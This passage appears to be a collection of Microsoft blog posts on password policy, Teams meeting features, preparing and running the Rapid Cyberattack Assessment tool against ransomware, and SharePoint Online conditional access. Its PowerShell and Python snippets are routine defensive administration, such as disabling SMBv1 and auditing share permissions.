1. Maintain an 8-character minimum length requirement (and longer is not necessarily better)

2. Eliminate character-composition requirements

3. Eliminate mandatory periodic password resets for user accounts

4. Ban common passwords, to keep the most vulnerable passwords out of your system

5. Educate your users not to re-use their password for non-work-related purposes

6. Enforce registration for multi-factor authentication

7. Enable risk based multi-factor authentication challenges
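As a rough illustration of recommendations 1 and 4, here is a minimal Python sketch of a banned-password check. The banned list and the leetspeak-substitution table are tiny invented samples; real systems, such as Azure AD Password Protection, use large and continuously updated lists:

```python
# Tiny invented sample - a real banned list contains millions of entries
BANNED = {"password", "qwerty", "letmein", "iloveyou", "lion"}

def normalize(pw):
    """Collapse common character substitutions so 'P@ssw0rd' matches 'password'."""
    table = str.maketrans("@0134$!5", "aoleasis")
    return pw.lower().translate(table)

def is_acceptable(pw):
    if len(pw) < 8:                              # recommendation 1: 8-char minimum
        return False
    base = normalize(pw.rstrip("0123456789"))    # ignore trailing digit padding
    return base not in BANNED                    # recommendation 4: ban common words

print(is_acceptable("P@ssw0rd1"))                 # False: normalizes to a banned word
print(is_acceptable("correct horse battery staple"))  # True
```

The point of the normalization step is that character-composition tricks ("P@ssw0rd1") do not make a common password uncommon, which is exactly why recommendation 2 drops composition requirements.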

Be sure to review the recommendations above, the data provided in the Microsoft Research Paper, data on attacks against your Office 365 identities each day, steps provided in the Email Phishing Protection Guide, and then develop a new strategy for your organization designed to protect your user identities. Keep in mind that email phishing is one of the newest, most popular and growing types of attacks against your organization today. You must get ahead of this threat, maintain your awareness of new attack vectors, and evolve your security posture accordingly.

An Even Better Strategy - Eliminate Passwords from your Organization

As you evaluate your current password policies and consider a modern strategy, also consider that the best way to protect user identities is to work towards eliminating passwords altogether. This sounds like another strange concept to introduce, but it is something Microsoft has been working on to help provide even more security for user identities. Below are a few blogs with more information about this strategy.

Building a World Without Passwords

Implementing Windows Hello

Microsoft Teams: Blur my background! (Please…)


Have you been on a conference call where everyone turns on their video, except for you? If you're like me, you don't like to turn yours on because of the messy house or ugly office behind you. Well - Microsoft Teams has you covered. You can now blur your background when in a conference in Microsoft Teams! You can use video and not worry about what's behind you. Watch the 90-second video below to learn more!

Microsoft Teams: Share my iPhone/iPad screen in a meeting! (While on the beach…)


You're in a conference call while at the airport on your iPhone, and the meeting starts to discuss that important PowerPoint slide or document. You say "I'll have to show you when I get back to my desk". It would be really nice if you could share it from your iPhone while in the meeting. Well - now you can, with Microsoft Teams!

Teams enables you to share the entire screen of your iOS device when in a Microsoft Teams meeting! Watch the below video to learn more! Enjoy!


Every Question Tells a Story – Mitigating Ransomware Using the Rapid Cyberattack Assessment Tool: Part 1


They say that a picture is worth 1,000 words.

But in some cases, the questions that you ask can also help tell a very interesting story.

Let me explain.

All of us are familiar with the devastating effects of ransomware that we saw last year in the WannaCry, Petya, NotPetya, Locky and SamSam ransomware attacks. We read the stories of the massive financial impact these attacks had on their victims, and we can only imagine the stress that the individuals in the IT departments of the impacted organizations went through trying to recover.

You may know that Microsoft has created a tool called the Rapid Cyberattack Assessment. The intent of the tool is to help an organization understand the potential vulnerabilities and exposures they have to ransomware attacks so that they can take steps to keep from being the next victim.

But like I said - every question tells a story - and in this tool there are many questions that an IT admin needs to ask himself or herself, and there’s a story behind each of these questions that helps make the tool’s value evident.

Let's take a look at the tool and as we go through the tool I'll try to give you the story behind each question.

Preparing the Environment

First, let’s download the tool itself.

It’s a free download from Microsoft, located here:

https://www.microsoft.com/en-us/download/details.aspx?id=56034

It’s important to download both the executable (RCA.exe) and the requirements document. The requirements document matters because if you don’t set up the tool and the target machines correctly, you likely won’t get some information that’s very valuable.

Conditions

First of all, you need to be aware that the Rapid Cyberattack Assessment tool runs in an Active Directory environment, and against Windows machines only. Any machines that you target with the tool must be part of an Active Directory domain. Additionally, the tool is limited in scope to 500 machines.

What should you do if your environment is larger than that?

There are really two simple options:

  1. Assess your entire environment in 500 machine chunks. Run the tool against a specific OU or group of OU’s that total no more than 500 machines. You can also just create lists (maybe exported from a spreadsheet) and use that as input for the tool. This method will definitely take a little bit of time and it won’t give you a single, comprehensive report view, either.
  2. Take sample machines from a number of different departments and run the tool against them. With this method, you would take (as an example) 50 machines from HR, 50 machines from Finance, 50 machines from Sales, etc…and run the tool against them. It doesn’t capture data on every single machine in the environment, but the tool is designed to give you an idea of where your exposures lie, and that would most likely be revealed in even a random sampling of machines. You can reasonably assume that any vulnerabilities identified in that subset of machines likely exists elsewhere in the environment as well.

Personally, if I was running the tool in my own environment and we had more than 500 machines, I would choose the second option. It gives me a rough idea of the issues I have to resolve and helps me prioritize them. If my environment has more than 500 machines, I’m probably managing them with some sort of automation tool anyway (like System Center Configuration Manager), so I don’t have to know exactly how each machine is configured. I’ll just define what the standard should be and push out that configuration.
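The two scoping options above can be sketched in a few lines of Python (machine and department names are invented; in practice you would export these lists from Active Directory):

```python
import random

# Invented inventory of 1,300 machines for illustration
machines = [f"PC{i:04d}" for i in range(1, 1301)]

# Option 1: assess everything, 500 machines per tool run
chunks = [machines[i:i + 500] for i in range(0, len(machines), 500)]
print(len(chunks))   # 3 separate runs, 3 separate reports

# Option 2: a 50-machine random sample from each department, one tool run
departments = {
    "HR": machines[:400],
    "Finance": machines[400:900],
    "Sales": machines[900:],
}
sample = {dept: random.sample(members, 50) for dept, members in departments.items()}
print(sum(len(s) for s in sample.values()))   # 150 machines total
```

Either way, the chunk or sample lists can be saved to text files and fed to the tool as its machine-list input.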

Hardware and Software

Installing the Rapid Cyberattack Assessment tool itself isn’t hard at all. You simply run the RCA.exe executable. There aren’t any options or choices to make other than agreeing to the license terms. Likewise, the machine you run the tool from doesn’t have a lot of requirements. It should be:

  1. A server-class or high-end workstation running Windows 7/8/10 or Windows Server 2008 R2/2012/2012 R2/2016.
  2. Preferably 16 GB+ of RAM, a 2 GHz+ processor, and at least 5 GB of disk space.
  3. Joined to the Active Directory domain you will be assessing.
  4. Running Microsoft .NET Framework 4.0.
  5. Optionally, Word, PowerPoint, and Excel installed to view the reports (or export the reports and view them on a machine that already has Office).

Account Rights

The service account you use to run the tool needs to be a domain user who has local administrator permissions to all the machines within the scope of the assessment. The account should also have read access to the Active Directory forest that the in-scope computers are joined to.

Network Access

The machines you are trying to assess obviously must be reachable by the assessing machine. Therefore, there must be unrestricted access from the tool’s machine to any of the in-scope domain-joined machines. By “unrestricted access” we mean you should make sure there are no firewall rules or router ACLs that would block access to any of the following protocols and services:

  • Remote Registry
  • Windows Management Instrumentation (WMI)
  • Default admin shares (C$, D$, IPC$)
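These services ride on well-known TCP ports: 135 for the RPC endpoint mapper (used by WMI and Remote Registry) and 445 for SMB (the admin shares). As a quick pre-flight sketch, you could test reachability from the tool’s machine like this (the host below is a placeholder address, not a real machine name):

```python
import socket

# Ports behind the required services:
# 135 = RPC endpoint mapper (WMI, Remote Registry); 445 = SMB (admin shares)
REQUIRED_PORTS = [135, 445]

def reachable(host, port, timeout=1.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

for host in ["192.0.2.10"]:   # placeholder; substitute your in-scope machines
    blocked = [p for p in REQUIRED_PORTS if not reachable(host, p)]
    if blocked:
        print(f"{host}: cannot reach ports {blocked}")
```

If a port shows up as blocked, the Group Policy adjustments described below are the likely fix.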

If you are using Windows Advanced Firewall on the in-scope machines, you may need to adjust the firewall to allow the assessment tool to run.

You can configure this using a Group Policy targeted at the in-scope machines. To do this, follow these steps.

  1. Use an existing Group Policy object or create a new one using the Group Policy Management Tool.
  2. Expand the Computer Configuration/Policies/Windows Settings/Security Settings/Windows Firewall with Advanced Security/Windows Firewall with Advanced Security/Inbound Rules
  3. Check the Predefined radio button, select Windows Management Instrumentation from the drop-down list, and click Next.
  4. Check the WMI rules for the Domain Profile. Click Next.
  5. Check the Allow the Connection radio button and click Finish to exit and save the new rule.
  6. Make sure the Group Policy Object is applied to the relevant computers using the Group Policy Management Tool

You would then do the same thing for the predefined File and Printer Sharing exception.

For the Remote Registry Service, you want to set the service to Automatic startup for the duration of the assessment.

  1. Open the Group Policy editor and the GPO you want to edit.
  2. Expand Computer Configuration > Policies > Windows Settings > Security Settings > System Services
  3. Find the Remote Registry item and change the Service startup mode to Automatic
  4. Reboot the clients to apply the policy

That should be enough to get you started.

In the next post, I’ll walk you through the survey questions in the Rapid Cyberattack Assessment tool.

https://blogs.technet.microsoft.com/cloudyhappypeople/2018/09/10/every-question-tells-a-story-mitigating-ransomware-using-the-rapid-cyberattack-assessment-tool-part-2/

I think you’ll find the stories revealed by the questions to be quite interesting.

Every Question Tells a Story – Mitigating Ransomware Using the Rapid Cyberattack Assessment Tool: Part 2


In my previous post, I explained how to prepare your environment to run the Rapid Cyberattack Assessment tool, and I told you that the questions in the tool would tell you a story.

https://blogs.technet.microsoft.com/cloudyhappypeople/2018/09/10/every-question-tells-a-story-mitigating-ransomware-using-the-rapid-cyberattack-assessment-tool-part-1/

So, let’s get started with the storytelling, shall we?

Survey Mode or Full Assessment?

Once you start the tool, you are asked if you want to run the tool in Survey Only mode, or in the Full mode.

What’s the difference?

 

  • Survey mode simply asks a set of questions that relate to your environment and then provides you with some guidance on what you should look at to start protecting against ransomware.
  • Full mode includes the survey questions, but it also runs a technical assessment against the machines in your environment to identify specific vulnerabilities.

Thus, survey mode is much quicker – but provides you with less information about the actual machines in your environment.

This is the mode we will use for the tool.

The next page just outlines the requirements for running the tool, which we discussed previously.

 

Now comes the fun part…the questions.

 

 

The Story-Telling Questions

The first question relates to patching.

 

Question:

“How long does it take to deploy critical security updates to all (99%+) Windows operating systems?”

Why do we ask?

When Petya hit in the summer of 2017, some of the worst-hit organizations were those who had failed to apply one patch to their Windows operating systems. The “Eternal Blue” exploit, which takes advantage of how SMBv1 handles specific types of messages, had been patched three months before Petya made headlines.

(https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010)

If organizations had applied the patches to their systems within 30 days, it's possible that they could have eliminated their exposure to that exploit.

------------------------------------------------------------

 

 

Question:

How long does it take to deploy critical security updates to all (99%+) deployed software (operating systems, applications, middleware, routers/switches/devices, etc.)?

Why do we ask?

Petya didn’t specifically leverage a weakness in, for example, a switch’s operating system. But it should go without saying that any vulnerability that exists on ANY piece of networking equipment or application or middleware is a weakness in the overall chain. If, for example, an adversary can compromise a switch and gain administrative control over all the traffic flowing between machines, they would then potentially have the ability to capture passwords and other critical information, which then allows them to make their next move.

---------------------------------------------

 

 

Question:

What strategy do you use to mitigate risk of Windows operating systems that cannot be updated and patched?

Why do we ask?

Unfortunately, some of the organizations that were most severely compromised by Petya/NotPetya/WannaCry had been running versions of Windows that have LONG been unsupported. There may genuinely be reasons why they haven’t been updated. Perhaps they are running software from a third-party that has not been tested against newer operating system versions. Maybe the third-party software vendor went out of business and no suitable replacement has been found. Regardless of the reason why the legacy operating systems exist, the key thing that needs to be addressed is “how do we reduce the risk of keeping these systems around?”. If they cannot be upgraded, can they be isolated on a network that isn’t connected to the Internet, and that separates them from the production network? Remember, if one machine can be compromised, it presents a potential threat to every machine on the network.

 

----------------------------------------------------------

 

Now the questions start to get a bit more complex….

Question:

What is your strategy on staying current with technology?

Why do we ask?

This question is really asking, “Are you taking advantage of every improvement in security – whether in the cloud, in Microsoft products, on MacOS, the various flavors of Linux, mobile devices, etc.?”

It’s probably safe to say that most of the major software and hardware vendors do their level best to improve the security posture of their products with every new release - whether it’s adding facial recognition, or stronger encryption, or even just addressing vulnerabilities that found their way into previous versions of code. If your user base is running primarily on Windows 7 or *gasp* Windows XP, there are, without any question, vulnerabilities that they are exposed to. Windows XP has, of course, reached its end-of-life, so any vulnerabilities identified in Windows XP are no longer being patched by Microsoft. That means these vulnerabilities will exist on your network for as long as those machines exist on your network.

That's a little scary.

The same is true of mobile devices, Mac OS, Linux machines, and so on. Unless they are updated, they will continue to be targeted by the bad guys using common, well-known exploits.

Don’t gamble with your network.

Stay current to the extent that you can do so.

-------------------------------------------------------

 

Question:

Which of the following is true about your disaster recovery program?

Why do we ask?

This is an interesting question. I’ve worked with a couple hundred Microsoft customers over the years, and it’s always interesting to hear exactly how each customer defines their disaster recovery strategy. Most customers have a regular backup process that backs up critical services and applications every day, or every couple hours. Most of those customers probably ship their backup tapes to an offsite tape storage facility for safekeeping in the event of a disaster. Many organizations will say they regularly validate the backups – when what they might mean is “I was able to restore Bob’s Excel file from two weeks ago, so I know the backup tapes are good.” Many organizations also perform some form of highly controlled DR testing yearly or quarterly.

But when you think about what Petya did, are those measures adequate? Imagine every one of your machines completely inoperable. You can recall all the backup tapes you’ve ever created, but your BACKUP SERVER is encrypted by ransomware. Now what? And even if it wasn’t, you can’t authenticate to anything because your domain controllers are encrypted. You can’t even perform name resolution because your DNS servers are encrypted. You could try to send an email from Office 365, but if you have ADFS set up, the authentication for Office 365 is happening on-premises…. against the domain controllers….which are encrypted by ransomware. This is the situation that some organizations faced.

Very few customers who were hit by Petya were prepared for a scenario where EVERYTHING was inoperable, all at the same time. Many were relegated to communicating via text message and WhatsApp because every other communication channel was inaccessible.

------------------------------------------------------

 

Question:

Which of the following measures have you implemented to mitigate against credential theft attacks?

Why do we ask?

Here’s the sad truth about Petya. There were organizations that had 97% (or more) of their workstations patched against the Eternal Blue exploit that we talked about earlier. But Petya didn’t just use one attack vector. Even if only one of the machines on a network of 5,000 machines was unpatched – that was enough of a wedge for Petya to gain a foothold. The next thing it did was attempt to laterally traverse from machine to machine using the local administrator credentials it was able to harvest from the unpatched machine. It would then attempt to use those credentials to connect to all the other machines on its subnet. So even if those machines were patched, if the administrator passwords were the same on those machines, those machines were toast.

Now think about that. How many organizations use a single administrator account and password on every desktop/laptop on the network? Based on what I’ve seen – it’s probably a sizable number. So even if those IT admins are very conscientious about patching, if they use the same local administrator password on every machine, a compromise of one machine is effectively a compromise of ALL the machines.

But how do you manage different passwords on thousands of different machines on a network?

We’ll discuss this quandary in a moment.

------------------------------------------------------

 

Question:

Which of the following measures have you implemented to protect privileged accounts and credentials?

Why do we ask?

It should be obvious that protecting your high-value credentials is important, but let’s talk about the measures you can choose from in the list:

  1. Create separate accounts for privileged activities (vs. standard accounts for email/browsing, etc.): Many organizations have learned this lesson and are good about creating separate sets of credentials for administrative activities and a lower-privileged account for everyday IT worker stuff like checking email, creating documents and surfing the web.
  2. Enforce multi-factor authentication on all privileged accounts: I’m happy to say I’m seeing many more organizations using multifactor authentication for highly-privileged accounts, whether it’s a token, or a phone-based tool like Microsoft Authenticator, or whatever. This is great to see, and I encourage every organization to start looking into MFA. In fact, Office 365 and Azure have MFA capabilities built right in – you just need to turn them on.
  3. All privileged users are prevented from using email and browsing the internet: The key word here is prevented. I would venture to say that most organizations advise their admins not to use their admin accounts for browsing the web or checking email. But what if you are fixing a problem with a server and Microsoft has a hotfix that you need to download? Can’t you just this once…..? The answer is “no”. Admin accounts should be prevented from browsing the internet. Period. Nothing good can come of browsing the wild and wooly internet with an admin account. It’s like walking in a seedy part of the city at night with $100 bills hanging out of your pocket.
  4. Restrict Tier 0 privileged accounts to only logon on Tier 0 servers and trusted workstations (such as PAWs): This is one of the most critical parts of securing administrative access. A core principle for securing administrative access is understanding that if admin A is logged into Workstation A, and he then makes an RDP connection to Server B, then the workstation is a “security dependency” of the server. Put simply, the security of Server B depends upon the security of Workstation A.

 

 

If administrative credentials can be harvested from Workstation A due to lax security controls (for example, using pass-the-hash or pass-the-ticket techniques) then the security of Server B is jeopardized. Therefore, controlling privileged access requires that Workstation A be at the same security level as the machines it is administering. Microsoft’s Privileged Access Workstation (PAWs) guidance can help you understand how to accomplish this.

Microsoft IT enforces the use of Privileged Access Workstations extensively to manage our own privileged assets.

Take the time to read more about Privileged Access Workstations here: http://aka.ms/cyberpaw

-------------------------------------------

 

Question:

Which of the following risk mitigation measures have you implemented to protect Tier 0 assets (Domain Controllers, Domain Administrators) in your environment?

Why do we ask?

The concept of “standing administrative privilege” is one that carries a significant element of risk today. It’s a much better practice to leverage “Just In Time” privileges. This means that the administrator requests, and is granted, the access they need AT THE TIME THEY NEED IT. When the task they are performing is complete, the privilege is revoked. When they need the privilege again, they need to request the access again. This is also good for auditing purposes.

A corollary to this idea is “Just Enough Admin” access. In this scenario, an admin is given THE LEVEL OF PERMISSIONS THAT THEY NEED, AND NO MORE. In other words, if you need to perform DNS management tasks on a Windows server, do you NEED Domain Administrator credentials? No, there is a DNS Administrator RBAC group that can be leveraged to grant someone the needed level of permissions.

Combine “Just Enough Admin” with “Just-In-Time” access, and you significantly reduce the chance of administrative credentials being exposed on your network.
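The combination can be modeled in a few lines of Python. This is a toy sketch, not a real implementation: the role and user names are invented, and real deployments use products such as Azure AD Privileged Identity Management rather than an in-memory dictionary:

```python
from datetime import datetime, timedelta, timezone

# Toy model of Just-In-Time + Just-Enough-Admin grants (names invented)
grants = {}

def request_access(user, role, minutes=60):
    """Grant a narrowly scoped role that expires automatically (JIT)."""
    grants[(user, role)] = datetime.now(timezone.utc) + timedelta(minutes=minutes)

def has_access(user, role):
    """Access exists only while an unexpired grant is on record."""
    expiry = grants.get((user, role))
    return expiry is not None and datetime.now(timezone.utc) < expiry

request_access("don.smith", "DnsAdmins", minutes=30)   # JEA: DNS rights only
print(has_access("don.smith", "DnsAdmins"))     # True while the grant is live
print(has_access("don.smith", "DomainAdmins"))  # False: never granted
```

Note the two properties working together: the grant names a narrow role rather than Domain Admin (Just Enough), and it evaporates on its own rather than standing indefinitely (Just In Time).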

More info here:

https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/implementing-least-privilege-administrative-models

---------------------------------------------------------

 

Question:

Which of the following is true with regard to your partners, vendors and outsourcers?

Why do we ask?

This is related to one of the more fascinating aspects of the Petya attack.

MeDoc is a company based in Ukraine that makes financial accounting software used by many businesses and organizations in Ukraine. The Petya attack began when a threat actor compromised the MeDoc application and inserted the Petya ransomware payload into one of the update packages. When the MeDoc customers received their next update, they also received the Petya ransomware. From there, Petya started looking for machines that were vulnerable to the Eternal Blue exploit. Once it found a vulnerable machine, it began attempting the lateral traversal attacks using local administrator privileges that we talked about earlier.

You see how the whole picture is starting to come together? Every question tells a story!

The point behind this question is this: in today’s world, it isn’t enough to simply consider your own security controls and processes. You also must consider the security practices of the vendors and partners you’re doing business with and understand how THEY react to attacks or compromises, because their threats could very well be your threats someday.

-----------------------------------------------------------

 

Question:

Which measures do you have deployed to protect your environment from malware?

Why do we ask?

Any IT admin worth their paycheck has for years been fighting the good fight against things like malware and spam.

But there’s a little more to the question than simply asking if you have an anti-spam and anti-malware component to your network management strategy. The question is also asking “how well does your anti-malware solution protect against the more sophisticated attacks?”

Consider this: from the time that no machines were infected by Petya to the time that tens of thousands of machines were infected by Petya was only about 3 ½ HOURS. That is simply not enough time for an antivirus vendor to reverse engineer the malware, develop a signature, and get it pushed down to their customers. The only real way an antimalware solution can be effective at that scale is if it gets telemetry from millions of endpoints, can detect anomalies using machine learning within SECONDS and take action to block across the world.

For an account of how Windows Defender did exactly that against the DoFoil crypto mining malware, read this story:

https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/

---------------------------------------------------------

 

Question:

Which of the following legacy protocols have you disabled support for in the enterprise?

Why do we ask?

As mentioned earlier in this article, the Petya attack exploited a vulnerability in the SMB v1 protocol that was nicknamed EternalBlue. SMB (also known as CIFS) is a protocol designed to allow shared access to files, printers and other types of communication between machines on a Windows network.

However, SMB v1, LanMan, and NTLM v1 authentication all have vulnerabilities that make them potential security risks.

Remember, any protocol that isn’t being used should be disabled or removed. If a protocol is still being used and cannot be removed, at the very least, you need to ensure it is patched when needed.

Learn how to detect use of SMB and remove it from your Windows network here:

https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and
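If you just want a quick check from an elevated PowerShell prompt, something like the following can help. Treat this as a sketch only (cmdlet availability varies by Windows version and SKU); the support article above remains the authoritative guidance.

```powershell
# Check whether the SMBv1 server component is currently enabled
Get-SmbServerConfiguration | Select-Object EnableSMB1Protocol

# Disable SMBv1 on the server side (configuration change only, no feature removal)
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force

# On client SKUs, you can also remove the optional feature entirely (may require a restart)
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
```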

--------------------------------------------------------

 

 

Question:

How do you manage risk from excessive permissions to unstructured data (files on file shares, SharePoint, etc..)?

Why do we ask?

Indeed, why does having knowledge of the permissions on a file share have anything to do with a ransomware attack? Again, there’s a key word here: excessive permissions.

For example, one very common mistake is to assign permissions to the “Everyone” group on a file share. The problem, as you no doubt are aware, is that the Everyone group does not simply mean “everyone in my company”. For that purpose, the “Authenticated Users” group is what you are likely thinking of, since that includes anyone who has logged in with a username and password. However, the Everyone group includes Authenticated Users – but it also includes non-password-protected accounts such as Guest or Local Service. That’s a MUCH broader set of user accounts, and it’s possible that some of those accounts are being exploited by people who may be trying to do bad things to your network.

The more people or services there are that have permissions on your network, the greater the chances that one of them will inadvertently (or intentionally) do something bad. It’s all about reducing your risk.

Therefore, a best practice is to perform an audit of your file shares and remove any excessive permissions. This is a good practice to perform anyway, since users change roles and may have permissions to things that they no longer need (such as if an HR person moves into a Marketing role).
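As a minimal sketch of what the first pass of such an audit might look like on a single Windows file server (using the built-in SmbShare module; the “Everyone” account name assumes an English-language OS):

```powershell
# List every SMB share on this server whose ACL grants access to "Everyone"
Get-SmbShare | Get-SmbShareAccess |
    Where-Object { $_.AccountName -eq 'Everyone' } |
    Format-Table Name, AccountName, AccessControlType, AccessRight
```

Any share that appears in this output is a candidate for tightening down to a more specific group.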

---------------

 

Well, that's a lot of questions, huh?

In my final post, I'll show you the last couple steps in using the tool and then walk through the findings.

https://blogs.technet.microsoft.com/cloudyhappypeople/2018/09/10/every-question-tells-a-story-mitigating-ransomware-using-the-rapid-cyberattack-assessment-tool-part-3/

 

Every Question Tells a Story – Mitigating Ransomware Using the Rapid Cyberattack Assessment Tool: Part 3


In the previous two posts in this series, I explained how to prepare your environment to run the Rapid Cyberattack Assessment tool, and I told you the stories behind the questions in the tool.

https://blogs.technet.microsoft.com/cloudyhappypeople/2018/09/10/every-question-tells-a-story-mitigating-ransomware-using-the-rapid-cyberattack-assessment-tool-part-1/

https://blogs.technet.microsoft.com/cloudyhappypeople/2018/09/10/every-question-tells-a-story-mitigating-ransomware-using-the-rapid-cyberattack-assessment-tool-part-2/

Let’s finish up with the final steps in running the Rapid Cyberattack Assessment tool and a review of the output.

Specifying Your Environment

We’ve now finished all the survey questions in the assessment. Now we need to tell the tool which machines to go out and assess as the technical part of the assessment.

There are three ways to accomplish this:

Server Name: You can enter the names of the machines you want to assess manually in the box, separated by commas, as shown below. This is only practical if you are assessing fewer than 10 machines. If you’re assessing more than that, I’d recommend that you use one of the other methods, or you’ll get really tired of typing.

 

 

File Import: Let’s say you want to assess 10 machines from 10 different departments. You could easily do this by putting all the machine names into a standard text file, adding one machine per line.

In the screenshot below, I have a set of machines in the file named INSCOPE.TXT, located in a folder named C:\RCA. This is a good way to run the assessment if the machines are spread across several OUs in Active Directory, which would make the LDAP path method less viable as a way of targeting machines. But again, it could be a lot of typing (unless you do an export from Active Directory – then it’s super easy).
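For example, that Active Directory export might look something like this. This is a sketch that assumes the ActiveDirectory RSAT module is installed and uses a fictional contoso.com domain; adjust the OU and file path for your environment.

```powershell
# Export computer names from one OU into the text file the tool will import
Get-ADComputer -Filter * -SearchBase 'OU=Workstations,DC=contoso,DC=com' |
    Select-Object -ExpandProperty Name |
    Out-File -FilePath 'C:\RCA\INSCOPE.TXT' -Encoding ascii
```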

 

 

LDAP Path: If you have a specific OU in Active Directory that you want to target, or if you have fewer than 500 machines in your entire Active Directory and just want to target all of them, the easiest way to do that is the LDAP path method. Simply type the LDAP path to the target OU, or to the root of your Active Directory, as shown in the screenshot below:
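For instance, assuming a fictional contoso.com domain, the LDAP paths might look like this:

```
LDAP://OU=Workstations,DC=contoso,DC=com   (target a single OU)
LDAP://DC=contoso,DC=com                   (target the root of the directory)
```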

 

NOTE: You only define your "in-scope" machines using ONE of the options noted above.

Click Next and run the assessment.

 

As you see, the assessment goes out and collects data about the machines in the environment, and then it generates a set of reports for you to review.

 

 

Click on View Reports to see the results of the assessment.

Notice that there are four files created. In my screenshot, you’ll also notice that the files don’t have the “official” Office icons – they just look like text files. This is because I don’t have Office installed on the Azure VM that is running the assessment. I can just copy the files to a machine with Office installed and open them from there. But as you see, there are two Excel spreadsheets, a Word document, and a PowerPoint deck. These are all created and populated automatically by the tool.

 

 

Let’s take a look at the tool’s findings.

Rapid Cyberattack Assessment Affected Nodes spreadsheet

First, let’s open the RapidCyberattackAssessmentAffectedNodes.xlsx spreadsheet.

In this spreadsheet you have several tabs along the bottom. The first tab is named “Host”, and it shows the names of the machines it was able to contact during the assessment, their operating system build version, install date and last boot-up time. All pretty standard stuff.

 

The second tab is for “Installed Products", and this is a comprehensive listing of all the installed software found on the machines in the assessment. This is one way of verifying the question in the survey about whether you are keeping all your apps and middleware up to date. As you can see in my screenshot, there’s some software running on my lab machines that is several versions old, and the spreadsheet tells me which machine that software is running on. This is all stuff that could easily be collected by a network management tool like System Center Config Manager, but not every company has that kind of tool, so we provide this summary.

 

The third tab is the "Legacy Computer Summary", which tells you how many of the machines in the assessment are running operating systems that are no longer supported by Microsoft. In my case, I had none. The Active Count and the Stale Count columns simply tell you whether the machine is being logged on to regularly or if perhaps it is simply a stale object in Active Directory and can just be deleted.

 

 

The "Legacy Computer Details" tab would give you more information about those legacy computers and could potentially help you determine what they are being used for.

The "Domain Computer Summary" tab is a summary of how many machines on your network are running current operating system versions.

Rapid Cyberattack Assessment Key Recommendations document

Now let’s go to the Rapid Cyberattack Assessment Key Recommendations Word document.

 

As you can see, this is a nice, professional looking document with an extensive amount of detail that will help you prioritize your next steps. One of the first things we show you is your overall risk scorecard, with your risk broken down into four major categories. In my case, I’ve got some serious issues to work on.

 

 

But then we start helping you figure out how to approach the problems. We show you which of your issues are most urgent and that require your attention within the next 30 days. Then we show you the mid-term projects (30+ days), and finally Additional Mitigation Projects that may take a more extended period of time, or that don’t have a set completion date (such as ensuring that the security of your partners and vendors meets your security requirements). By giving you this breakdown, a list of tasks that could seem overwhelming (such as what you see in my environment below) is somewhat more manageable.

 

 

We then get more granular and give you a listing of the individual issues in the Individual Issue Summary.

You’ll notice that each finding is a hyperlink to another location in the document, which provides you with a status on the issue, a description of the issue, its potential impact, and (for some of the issues) which specific machines are affected.

This is essentially the comprehensive list of all the things that should be addressed on your network.

So how do you track the progress on this?

Excel Resubmission Report spreadsheet

That’s the job of the Excel Resubmission Report.xlsx file. This file is what you would use to track your progress on resolving the issues that have been identified. In this spreadsheet you have tabs for “Active Issues” (things that require attention), “Resolved Issues” (things you’ve already remediated), and “Not Applicable Issues” (things that don’t apply to your environment).

 

This spreadsheet is a good way for a project manager to see at a high level what progress has been made on certain issues and where more manpower or budget may need to be allocated.

Rapid CyberAttack Assessment Management Presentation PowerPoint deck

This is the deck – only a few short slides – that provides a high-level executive summary of all the things you identified and how you intend to approach their resolution. This is a very simple deck to prepare and can be used as a project status update deck as well.

 

Every Question Tells a Story

So that’s the Rapid Cyberattack Assessment tool in its entirety. It isn’t necessarily the right tool for a huge Fortune 100 company to use to perform a security audit; there are much more comprehensive tools available (and they usually are quite expensive, which this tool is NOT).

But for the small-medium sized businesses who simply want to understand their exposure to ransomware and take some practical steps to mitigate that exposure, this tool is a great starting point.

SPO Tidbit – Getting to know conditional access and SharePoint


Hello All,

The cloud has forced us to rethink security as corporate boundaries have changed. It is no longer good enough to build firewalls to protect your data; you need to look at how to protect data that is not part of your network.

In O365, to help you reach this goal, we have Conditional Access, which is managed through Intune. But if your access needs are not extensive, you might be able to use SPO Conditional Access without Intune, and that is what we will take a look at right now…

Location based: 

This policy can help prevent data leaks and can help meet regulations to prevent access from untrusted networks. You can limit access to specific network ranges from the SPO Admin console. Once configured, any user who attempts to access SharePoint and OneDrive for Business from outside the defined network boundary will be blocked.

The default policy is disabled; no restrictions will be enforced until you configure it.

If you have also configured AAD Premium to restrict access by IP network range, the AADP whitelist is interpreted first, followed by the SharePoint policy. As a result, you may choose to apply a policy that is more restrictive than the one in AADP. However, you cannot enable access to an IP address range that is also prohibited by AADP.
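The location-based restriction can also be applied with the SharePoint Online Management Shell. Treat this as a sketch: the IP range below is a placeholder, and it must include the IP address of the machine you are administering from, or you will lock yourself out.

```powershell
# Allow SharePoint Online access only from a trusted network range
# (placeholder range – be sure it covers your own admin workstation)
Connect-SPOService -Url <URL to your SPO admin center>

Set-SPOTenant -IPAddressAllowList '131.107.0.0/16' -IPAddressEnforcement $true
```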

 Users will see the following message

 

 

NOTE: You need to be careful that your network ranges include the IP address of your current machine. IP address ranges are strictly enforced, so entering a range that doesn’t include your machine will lock out the admin session. If this happens, you will have to work with support to resolve the issue. Also, this restriction will prevent the sync service from working outside the trusted network, but it will not prevent synced data from traveling outside the trusted networks; if the data is that sensitive, consider disabling the sync service in the SPO admin console.

Device based:

Device-based policies let you allow or block access, or challenge users with Multi-Factor Authentication, device enrollment, or a password change. Policies for SharePoint Online and OneDrive for Business help you ensure that data on corporate resources is not leaked onto unmanaged devices (such as non-domain-joined or non-compliant devices) by limiting access to content to the browser and preventing files from being taken offline or synchronized with OneDrive for Business on unmanaged devices.

NOTE: By default, files that can’t be viewed online (such as zip files) can be downloaded. If you want to prevent the download of these files onto unmanaged devices, you can opt in to block the download of files that can’t be viewed on the web. This results in a read-only experience for end users, and customizations may be affected.

Site-Scoped:

